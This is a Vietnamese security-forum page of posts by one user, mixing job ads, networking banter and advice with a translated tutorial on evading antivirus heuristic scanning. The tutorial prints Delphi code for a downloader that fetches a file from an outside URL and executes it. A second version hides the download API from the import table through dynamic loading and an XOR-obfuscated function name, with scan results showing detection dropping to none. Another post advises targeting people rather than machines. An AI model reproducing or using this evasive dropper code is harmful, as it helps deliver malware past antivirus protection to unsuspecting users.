banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: eyesdog  XML
Profile for eyesdog Messages posted by eyesdog [ number of posts not being displayed on this page: 13 ]
 
Công ty mình đang có hướng đầu tư mới tập trung vào các sản phẩm phần mềm trên Android và iOS. Cần tuyển 9 lập trình viên cho mảng này 3 Android, 3 iOS, 3 back-end. Làm việc tại Hà nội, lương thoả thuận. Bản mềm CV gửi về thang76@gmail.com.
Cần người giỏi về lập trình 2D, 3D, hoặc game engine để phát triển hệ thống mô phỏng. Lương thoả thuận. Liên hệ A.Thắng: 0987181888
Có lần dạy cho một ông về sự khác nhau giữa hub và switch, nói mãi rồi ông ấy kết luận: "Vậy hub là bộ nhân, switch là bộ chia." Có lẽ đây là câu trả lời ngắn nhất được tôi chấp nhận !!!
Tôi nghĩ lần sau ai đó tấn công Dos thì nên có 2 người, 1 người vận hành Dos, 1 ông ra quán khác, hoặc dùng line khác test các thao tác cơ bản, nếu nó die thì chắc là die, không die thì chắc là không die. Dùng 1 line + 3 tools không đánh giá được độ tin cậy khó nói lắm. Nhắn vớí antidos: Nếu đúng tools của bạn có hiệu quả tốt (được kiểm chứng chặt chẽ), chắc chắn nó rất có khả năng mang lại cho bạn danh tiếng và tiền bạc, do vậy cần tôn trọng công sức của chính mình bằng cách kiểm tra nó thật kỹ. Tôi biết nhiều người sẵn sàng trả giá cao cho những sáng tạo trong lĩnh vực IT, nhất là IT Việt Nam.
Đổi ngày hệ thống trên client hay trên server? Nếu trên client thì chắc là pass được, vì xác suất cao là thuật toán sinh 4 số đó nằm trong 1 script nào đó trên trang, soi kỹ sẽ thấy thôi. Còn nếu là phần mềm thì chắc phải debug. Chuyện debug thì chắc bạn khó tự làm được ? !!!
Trả lời vui:
- Đọc xong câu hỏi, chẳng hiểu bác conmale nói gì, vậy là lên google search xem "Stateful firewall " là cái gì mà kinh thế. Kết quả ra link này: "http://en.wikipedia.org/wiki/Stateful_firewall" có vẻ dễ hiểu chút, dù không chắc nó có đúng là cái bạn bác conmale đề cập đến không nữa. Mọi thứ tiếp theo sẽ căn cứ tạm theo cái định nghĩa này vậy.
"In computing, a stateful firewall (any firewall that performs stateful packet inspection (SPI) or stateful inspection) is a firewall that keeps track of the state of network connections (such as TCP streams, UDP communication) travelling across it. The firewall is programmed to distinguish legitimate packets for different types of connections. Only packets matching a known connection state will be allowed by the firewall; others will be rejected."
Tạm viết tắt Stateful firewall là SF.
Ngoài ra, "tấn công" thì chịu không thể tìm được một định nghĩa đủ đơn giản, bao quát, dễ hiểu và phản ánh chính xác cái việc "chống tấn công" của một ông quản trị mạng ...
Theo cái định nghĩa này, thì việc mua nó về trang bị cho công ty trước mắt sẽ là một "thảm họa" cho tụi tay ngang như tôi vì:
- Tôi phải tìm hiểu xem "state of network connections" của công ty là cái gì để cài vào cho thằng SF nó chạy (không thì cài nó lên nó cấm tiệt thì khổ !!!) Chắc đồ xịn thì việc cài vào không khó, và có thể nó sẽ có sẵn vài mô hình mẫu cho tôi học, thử trước khi áp dụng thật. Nhưng việc này sẽ có khối lượng rất lớn với các công ty mà chi nhánh nào cũng tưởng mình giỏi CNTT.
- Giả sử việc trên xong, chạy ngon lành. Sếp bắt được tôi ngủ gật (vì mệt do công đoạn trước và vì từ sau đó cũng ít việc hơn nhiều) trong giờ làm việc, quyết định hạ bậc lương, thế là từ đó tôi bị mắc bệnh khó ngủ trong giờ hành chính !!!
- Một hôm, tự nhiên sếp nói: "Tao thấy thằng công ty A nó có ứng dụng Web 3.25 gì đó hay lắm", tụi mày xem thế nào ?". Thế là mọi việc lại rối tung lên vì rất có thể các mô hình cũ phải thay đổi, lại cấu hình lại cái SF,...
- Nhưng rồi Web 3.25 cũng xong, nhưng sau đó các ứng dụng cứ nặc nè chạy, hiệu năng mạng giảm hẳn, nhưng lạy trời dù sao nó vẫn chạy...
... còn nhiều chuyện khác nữa xảy ra mà do công ty tôi chưa mua nên tôi chưa biết hết được...
Nhưng tôi biết chắc chắn, sếp sẽ không bao giờ cho tôi ăn ngon ngủ kỹ, và việc của tôi không chỉ là chống tấn công.
Các tut ngon nhất của tây nhiều khi nói vậy nhưng không phải vậy, không thử, không hiểu, thực hiện máy móc theo tut mà được thì tôi chết liền !!!
Hãy nghĩ theo cách của hacker. 2 máy cùng LAN giống như bạn cùng phòng. Muốn hack máy kia tương tự như điều khiển ông bạn cùng phòng, nhảy bổ vào bảo ngay nó là mày phải làm cái này cái kia thì chỉ có toi. Đầu tiên phải tìm hiểu nó thích gì, hay chơi ở đâu, rủ nó đi uống nước, đi nhậu, cho nó ít lợi ích trước mắt gì đó rồi hãng gạ nó làm cái gì đó, hoặc chờ cơ hội nó ngủ quên... Máy cũng vậy thôi ... Win, nux gì thì cũng do người điều khiển, đừng cố nhằm vào cái máy, mà nhằm vào người sẽ hiệu quả hơn.
Sửa key thành:
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
(Default) REG_SZ "\"%1\" %*"

Operator là một bộ phần mềm được đóng gói và có thể dễ dàng cài đặt trên Usb cho phép người dùng duyệt web ẩn danh dễ dàng tại quán internet cafe, thư viện...
Nó là sự kết hợp giữa Opera Browser, The Onion Router và Privoxy.
Hệ điều hành: Windows
Download: http://letwist.net/operator
Tác giả:BuGGz (bài Bypasser L'heuristic des antivirus )
Người dịch: Tôi.

Cách vượt qua cơ chế quét heuristic của AV.

Ngày nay, phần lớn các phần mềm Antivirus (AV) đều tích hợp sẵn tính năng quét heuristic để phát hiện các đoạn mã nguy hiểm và các hàm API phổ biến được dùng trong các phần mềm độc hại. Mục đích của tính năng này là phát hiện virus mà không cần thêm chứ kỹ nhận dạng của từng con một. Tính năng này cho phép phát hiện virus trước khi chúng được phát tán công khai. Trong bài viết này tôi sẽ trình bày cách vượt qua cơ chế quét heuristic.
Làm thế nào chúng ta làm được như vậy ?
Tôi sẽ sử dụng một ví dụ của Lord, chúng ta sẽ viết một chương trình web downloader sử dụng hàm API ?urldownloadtofile?. Hàm này sẽ bị các cơ chế quét heuristic đánh giá là nguy hiểm.

Chương trình Delphi:

program Project2;

{$APPTYPE CONSOLE}

uses
URLMon,windows,
ShellApi,
SysUtils;

begin
UrlDownloadToFile(nil, PChar('http://fahde.free.fr/bug/rel/ICrypt%201.0.rar'), PChar('C:\ICrypt.rar'), 0, nil) ;
ShellExecute(0,'open',PChar('C:\ICrypt.rar'),nil,nil,SW_SHOW);

end.

Sau khi dịch chương trình này, thử quét nó ta sẽ được kết quả như sau (lấy từ virustotal):
Ikarus: Trojan-Downloader.Win32.Banload.BQ
Bit defender: BehavesLike:Trojan.Downloader
NOD32: NewHeur_PE probably unknown virus
Vậy là ta đã thu được một kết quả không tốt cho mình ? Và ta tự hỏi, làm thế nào mà AV lại phát hiện ra chương trình ta tự viết dù ta chưa hề phát tán nó ?
Một mình hàm API URLDOWNLOADTOFILE sẽ không bị HS (heuristic scanner) cho là nguy hiểm nhưng nếu kết hợp với ShellExecute thì HS sẽ cho nó là nguy hiểm, chính vì vậy mới cho kết quả như trên. Tôi xin giải thích, khi chương trình của ta gọi hàm URLDOWNLOADTOFILE, nó sẽ không gọi trực tiếp từ file .DLL chứa hàm(urlmon.dll), thay vào đó nó gọi từ bộ nhớ. Nhưng một exefile/dllfile không biết chỗ nào chứa hàm Shellexecute API ở đâu trong bộ nhớ bởi vậy nó dùng IAT "Importation Address Table". IAT biết chỗ nào trong bộ nhớ chứa API và chương trình của ta truy cập APIs thông qua IAT.
Giờ ta đã biết HS làm việc thế nào, và đây là lúc ta sẽ vượt qua nó. Mọi hàm API ta sẽ dùng đều được lập danh sách trong IAT, AV quét IAT và nếu thấy API của ta HS sẽ phát hiện nó ngay. Ta sẽ làm cho API của ta không xuất hiện trong IAT, để làm được điều đó ta sẽ sử dụng 2 API khác mà HS không nghi ngờ là LoadLibrary và GetProcAdress. Hai hàm này sẽ cho phép ta dynamically load file urlmon.dll của hàm UrlDownloadToFile. Và giờ ta sẽ không cần hỏi IAT vị trí của các API ta sẽ dùng.

Viết lại chương trình như sau:
program Project2;

{$APPTYPE CONSOLE}
// By BuGGz : www.instinct-coders.tz4.com
uses
windows,messages,dialogs,
ShellApi,
SysUtils;

type
//we declare the function with the correct paramters so we can manipulate it later.
TMyProc = function(Caller: IUnknown; URL: PChar; FileName: PChar; Reserved: DWORD;LPBINDSTATUSCALLBACK: pointer): HResult; stdcall;
// the function for decrypting.
function Decrypt(Str : String; Key: string): String;
var
Y, Z : Integer;
B : Byte;
begin
Z := 1;
for Y := 1 to Length(Str) do
begin
B := (ord(Str[Y]) and $0f) xor (ord(Key[Z]) and $0f);
B := b xor 10 ;
Str[Y] := char((ord(Str[Y]) and $f0) + B);
Inc(Z);
If Z > length(Key) then Z := 1;
end;
Result := Str;
end;



var
Handle: THandle;
Maproc: TMyProc;
crypte,decrypte : string;
begin
Decrypte := Decrypt(']ZDLgfdgil\gNadmI' ,'2');
showmessage(Decrypte); //to make sure that the final result is good
Handle := loadlibrary('Urlmon.dll'); // load the dll

if Handle <> 0 then

begin

try

//Decrypt then load the function dynamically from the DLL
@Maproc := GetProcAddress(Handle, pchar(Decrypt(']ZDLgfdgil\gNadmI' ,'2')));

if @Maproc<> nil then

begin
Maproc(nil,'http://fahde.free.fr/bug/rel/ICrypt%201.0.rar','C:\ICrypt.rar',0, nil); // this is the download function which is renamed to Maproc to avoid detection
ShellExecute(Handle,'open',PChar('C:\ICrypt.rar'),nil,nil,SW_SHOW);
end;

Finally

FreeLibrary(Handle); // free the dll file after we?ve used it.

end;
end

end.

Quét lại sau khi dịch:
Ikarus: No virus found in memory
Bit defender: No virus found in memory
NOD32 : No virus found in memory

Bản quyền:
Thuộc về Lord tôi chỉ dịch.
BuGGz , www.instinct-coders.tz4.com
Bạn có thể tham khảo trong link http://www.diendantinhoc.com/lofiversion/index.php/t30115.html
Trong Dos nếu muốn là được như ý le_quoc_bao thì phải chặn ngắt thời gian, cách thực hiện có thể tham khảo trong cuốn sách của Peter Norton về cấu trúc máy tính. Cái này đã quá lâu rồi, lần đầu tiên làm được vào năm 95-96 gì đó nên giờ chỉ nhớ có thế.
Thử trên XP SP2, nhưng mà đĩa cài Win là FAT32, đúng như No13 đã nói. Cái này có cái hay phết đấy.
Có lẽ tôi già hơn bạn khá nhiều, tên eyesdog, ở HN, không có gì đặc biệt, bạn cần tin là quanh bạn có lẽ có nhiều người thông cảm và ủng hộ bạn hơn rất nhiều một ông vô danh xa tít nào đó smilie) . Bạn cứ tham gia diễn đàn, cần gì cứ hỏi, sẽ có nhiều người cố giúp bạn trong khả năng họ có thể chứ không phải chỉ riêng ai.
Chương trình viết bằng VC, C++ nói chung sẽ chạy trực tiếp trên hệ điều hành, còn C#, VB.NET thì sẽ chạy thông qua .NET Framework. Để dễ hiểu, chỉ cần nhìn một thằng thì làm việc trực tiếp còn một thằng cần thêm một ông ngỗi giữa làm thông ngôn, cái gì mạnh hơn có lẽ là đã rõ, còn trong trường hợp cụ thể việc can thiệp sâu hay không sâu vào hệ điều hành phụ thuộc vào người viết( Mấy ông quan to làm việc qua phiên dịch vẫn có thể tác động đến đối tượng mạnh hơn mấy ông học đại học ngoại ngữ ra làm việc trực tiếp)
Tôi đã gặp vài người (ở VN) không có bằng đại học, có ngườì học đại học 1 năm rồi nghỉ, bây giờ có lương tụi Mỹ trả > 500usd/tháng, cũng có ông sắp là tiến sỹ CNTT (đang làm luận án và 95% là bảo vệ thành công) không thể tự viết nổi chương trình máy tính bất kỳ, ý tôi là bạn không cần phải tự ti vì những điều mình chưa có . Tự học thì đúng là rất khó, nhưng không phải là không giả quyết được nếu đúng là có đam mê. Nếu bạn đã có chút căn bản, tôi nghĩ bạn chỉ cần không ngừng tự đặt ra và trả lời được các câu hỏi "Tại sao lại thế ?", "Có cách nào nhanh hơn không ?" là bạn sẽ giỏi thôi, tất nhiên là đừng đặt cho mình những đích cao quá làm gì, tập trung vào các mục tiêu ngắn hạn, vài tháng một, một thời gian bạn sẽ thấy bạn đã đi được cả một quãng đường dài.
Giỏi hay không giỏi thực ra phản ánh ở năng suất lao động, nếu bạn có thể lắp một chiếc máy tính trong 5ph, bạn sẽ có việc làm khá ổn, thu nhập của một thợ sửa xe máy giỏi cao hơn một kỹ sư thường, và đóng góp cho xã hội của ông thợ sửa xe giỏi có lẽ cũng cao hơn (phản ánh qua những gì xã hội chấp nhận trả cho ông thợ). Truyện xưa có nói ông bán dầu làm cho ông nghệ sỹ hàng đầu phải chịu thua khi biểu diễn rót dầu qua lỗ trên đồng xu mà không mất rơi dù chỉ 1 giọt.
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|